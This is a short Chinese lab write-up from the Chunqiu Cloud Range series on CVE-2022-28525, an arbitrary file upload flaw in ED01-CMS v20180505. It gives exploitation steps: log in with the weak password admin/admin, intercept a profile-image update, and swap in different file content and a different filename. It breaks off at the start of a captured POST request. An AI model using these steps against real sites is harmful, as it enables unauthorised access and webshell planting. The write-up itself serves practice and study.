春秋云境：CVE-2022-28525文章合集：春秋云境系列靶场记录（合集）ED01CMSv20180505存在任意文件上传漏洞：CVE-2022-28525漏洞介绍ED01-CMSv20180505存在任意文件上传漏洞解题步骤访问URL通过弱口令进行登录：admin/admin登录后在图中位置点击进行图片更新，需要将密码等都写上抓包将图片信息进行替换，并修改文件名POST/admin/users.php?source=edit_user&id=41HTTP/1.1Host:eci-0ee52zd9ip0rufvl.cloudeci1.ichunqiu.comContent-Length:13